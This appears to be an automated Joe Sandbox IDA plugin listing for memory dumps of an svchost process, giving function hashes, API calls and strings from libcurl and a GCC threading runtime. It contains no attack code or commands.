                          • Instruction ID: eda5080b957688927ceae3cd39c26854b3b6e7bc7c764678da65bb95ffdb1d5c
                          • Opcode Fuzzy Hash: 599a1c7a1d5416f27c979ff16cb942ea950d10dc1930039c8dc97ed055a1bf7a
                          • Instruction Fuzzy Hash: 4F317C6AF0F6CAC5FB16AE2490243B926A09F23F84F080035DA0D467D7EF6CE464C359
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CreateEventcallocfree
                          • String ID: d
                          • API String ID: 1150888495-2564639436
                          • Opcode ID: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                          • Instruction ID: 258b84132e8e52d5559643e39df5583ed150a00807e63722faac7d9bc607948d
                          • Opcode Fuzzy Hash: 443729bc57561f6a795b4ea31471f5cae1b3903848d998f3ab6d23dae0dc128a
                          • Instruction Fuzzy Hash: C4311D39B1AA4AC1EB02DF61D8643A962A1FF9AF44F840831DA4D463ABDF7DE504C354
                          APIs
                          Strings
                          • Error cleaning up spin_keys for thread , xrefs: 6494444A
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentDebugOutputStringThread_ultoa
                          • String ID: Error cleaning up spin_keys for thread
                          • API String ID: 2892977721-2906507043
                          • Opcode ID: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                          • Instruction ID: 6273affc26e83ed8f3c49a0d043d27fd3918550a2ad95c3d4e2fd7ba9164ba49
                          • Opcode Fuzzy Hash: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                          • Instruction Fuzzy Hash: A711086278868082FF258F34E41035A2BE2E74676CF540731DA68467E8DB3DC545CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Init_inflate
                          • String ID: 1.3.1$Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                          • API String ID: 2898956097-2669389255
                          • Opcode ID: 9c085d17d2010e19597c6ec7f19489e1812f7325124c332b6a279acef5a48fcd
                          • Instruction ID: 08398bb5a9e2dc8ff652af9b9fa86d9838bc4aa235cafc5b4d8d016bddbb5ef2
                          • Opcode Fuzzy Hash: 9c085d17d2010e19597c6ec7f19489e1812f7325124c332b6a279acef5a48fcd
                          • Instruction Fuzzy Hash: C7119167B19A86C1EB51CF16F4502692360FB45BC0F841032EA5D57B56DF2CD592C708
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 64941C95
                          • GetCurrentThreadId.KERNEL32 ref: 64941CD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                          • API String ID: 2882836952-884133013
                          • Opcode ID: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                          • Instruction ID: a46da822108b5d6275fe5987b69bee3bdd31e53238ff1fe5d77ed74437cca604
                          • Opcode Fuzzy Hash: 4ee0d97755dc30819cc537833119c3faf73e6318be0a8baa9e96090fdbdd1b5a
                          • Instruction Fuzzy Hash: 6B018F7A38470086EB10DF26F840B4A3BA5F399F98F048225DD4C43710EB39C526C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastsend
                          • String ID: SENT$Sending data failed (%d)
                          • API String ID: 1802528911-3459338696
                          • Opcode ID: 2aff274a2aeec338eb62c68624eddaac8b154ca536ab6b363adfdbf71e396f6b
                          • Instruction ID: 84e5b35879f1af6f0dfcafb85cea7157ceb441bf74ce9823d6e60b96d0afce9e
                          • Opcode Fuzzy Hash: 2aff274a2aeec338eb62c68624eddaac8b154ca536ab6b363adfdbf71e396f6b
                          • Instruction Fuzzy Hash: 3201F727B2D69681DB11CF1AF89066A6B20EB8AFD0F542134FE4E47B5BDE2CC0418744
                          APIs
                          Strings
                          • Error while processing content unencoding: %s, xrefs: 00007FFDA557C7CD
                          • Error while processing content unencoding: Unknown failure within decompression software., xrefs: 00007FFDA557C7DB
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: freeinflate
                          • String ID: Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                          • API String ID: 3681154942-1163695657
                          • Opcode ID: 22443a040a1fca1175d6249ada236b8e373c81af97ff458de85bb1a143640a9d
                          • Instruction ID: 5e3b42adfddd49474e99d3a6b9710cb09a3be829ef9d0edde58485a9517dd04a
                          • Opcode Fuzzy Hash: 22443a040a1fca1175d6249ada236b8e373c81af97ff458de85bb1a143640a9d
                          • Instruction Fuzzy Hash: 3001526BB0A656D2EB15CF11E9643682360FB46F80F804175D64D47B56DF38E4A5C308
                          APIs
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CA5
                            • Part of subcall function 00007FFDA5580C70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CB8
                            • Part of subcall function 00007FFDA5580C70: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CDF
                            • Part of subcall function 00007FFDA5580C70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FFDA5580E47,?,?,?,00007FFDA5571F21), ref: 00007FFDA5580CEC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6E2
                          • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55CA6F0
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$ByteCharMultiWide$_wcsdupmalloc
                          • String ID: %s/%s
                          • API String ID: 612564020-2758257063
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: _Jv_RegisterClasses$libgcj-16.dll
                          • API String ID: 1646373207-328863460
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 64942789
                          • LeaveCriticalSection.KERNEL32 ref: 6494279F
                            • Part of subcall function 64941A20: EnterCriticalSection.KERNEL32 ref: 64941A36
                            • Part of subcall function 64941A20: LeaveCriticalSection.KERNEL32 ref: 64941A53
                          • LeaveCriticalSection.KERNEL32 ref: 64942803
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5598623
                            • Part of subcall function 00007FFDA559F170: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA559F1A7
                            • Part of subcall function 00007FFDA559F170: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA559F1B7
                            • Part of subcall function 00007FFDA559F170: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA559F1C5
                            • Part of subcall function 00007FFDA559F170: memset.VCRUNTIME140 ref: 00007FFDA559F1FB
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5598680
                            • Part of subcall function 00007FFDA55AFD70: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55AFD87
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$calloc$memset
                          • String ID: Content-Type$multipart/form-data
                          • API String ID: 2591755499-4152945368
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: xn--
                          • API String ID: 1294909896-2826155999
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: %s: %s$Start Date$TRUE
                          • API String ID: 0-2230884944
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_time64memmove
                          • String ID:
                          • API String ID: 1971662853-0
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          APIs
                          • GetHandleInformation.KERNEL32 ref: 64945F87
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: HandleInformation
                          • String ID:
                          • API String ID: 1064748128-0
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 649472DB
                            • Part of subcall function 649456A0: WaitForSingleObject.KERNEL32 ref: 649456C4
                          • _errno.MSVCRT ref: 6494733E
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 6494735B
                          • _errno.MSVCRT ref: 649473B8
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Time$FileSystem_errno$ObjectSingleWait
                          • String ID:
                          • API String ID: 619567339-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Handle$Close$InformationObjectSingleWait
                          • String ID:
                          • API String ID: 135186658-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$calloc
                          • String ID: Curl_conn_tcp_listen_set(%qd)
                          • API String ID: 3095843317-3050117601
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 64944CCD
                          • GetProcessAffinityMask.KERNEL32 ref: 64944CDC
                          • GetCurrentProcess.KERNEL32 ref: 64944D12
                          • SetProcessAffinityMask.KERNEL32 ref: 64944D1A
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Process$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1231390398-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Time$System_errno$File
                          • String ID:
                          • API String ID: 2046127076-0
                          APIs
                          Strings
                          • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC
                          • Address %p has no image-section, xrefs: 64947897, 649479E2
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: QueryVirtual
                          • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                          • API String ID: 1804819252-157664173
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 6494251B
                          • LeaveCriticalSection.KERNEL32 ref: 64942544
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 649423EB
                          • LeaveCriticalSection.KERNEL32 ref: 64942412
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          APIs
                          • EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                          • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                          • EnterCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421E5
                          • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421F6
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                          • Instruction ID: 7a5ad15dbad42ca2a217f772ee4adc9c7e6a81657260e45da0a70067a48174a5
                          • Opcode Fuzzy Hash: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                          • Instruction Fuzzy Hash: B8018F237582549EE716DB77EC00B5AA7A4B789FD8F448122EE0983B14EA38C1438B01
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: c0e2cc5d984bb2fa6972c2feed5f163034c72a56b7630030a885c6ec6e1cf5bf
                          • Instruction ID: 29fe65fa7e68077af7204a2eb76749c521a46415a01ab30061e00336b8129e4a
                          • Opcode Fuzzy Hash: c0e2cc5d984bb2fa6972c2feed5f163034c72a56b7630030a885c6ec6e1cf5bf
                          • Instruction Fuzzy Hash: 80110A7AA0AA4982EB169F65E46033873B4EF95F94F444031CA4E03BA5CE38D455C348
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: freemalloc
                          • String ID:
                          • API String ID: 3061335427-0
                          • Opcode ID: 66197ecf1186118a8c42ff881f6b3ed1c2e05c151971c28045e0d41d0e14358b
                          • Instruction ID: 73dc592d774b86efe6a3ab657335a4e33730c9fc38b0d1b317b3ccd24ad13bd5
                          • Opcode Fuzzy Hash: 66197ecf1186118a8c42ff881f6b3ed1c2e05c151971c28045e0d41d0e14358b
                          • Instruction Fuzzy Hash: 34F04F79B1AB4582EB569F26F86423822B0EF8AF84B485034DA4E47785DF3CD8A4C314
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 1e3480862a4a9241cbd34876f8c395ca154369884af30e6ae4febbb5dbfcf72e
                          • Instruction ID: ec2dbe3c01f29091d286e13fdba201de60ee65889992ff5d6f11f37cdeccae9d
                          • Opcode Fuzzy Hash: 1e3480862a4a9241cbd34876f8c395ca154369884af30e6ae4febbb5dbfcf72e
                          • Instruction Fuzzy Hash: AE01083AA0AB4582EB169F12E4643696770FB4AF90F085031EE4E07B55CF3CD4568714
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA5596791
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559679B
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55967A5
                            • Part of subcall function 00007FFDA5585D80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00007FFDA55968BE,?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?), ref: 00007FFDA5585DB7
                            • Part of subcall function 00007FFDA5585D80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00007FFDA55968BE,?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?), ref: 00007FFDA5585DCE
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55967C0
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 4a9e63719135c01590bbd7e9246862d27d46a5a06684678f83abdb0d2e2eb60a
                          • Instruction ID: 2656c2eee2e09d0bd1924caa984cb3063d69f836642739ac8523b12fabff736c
                          • Opcode Fuzzy Hash: 4a9e63719135c01590bbd7e9246862d27d46a5a06684678f83abdb0d2e2eb60a
                          • Instruction Fuzzy Hash: 95E0C96DB5790A91EB16BF25DC791782330EF9AF45B541031E90E437A2CE2CD989C368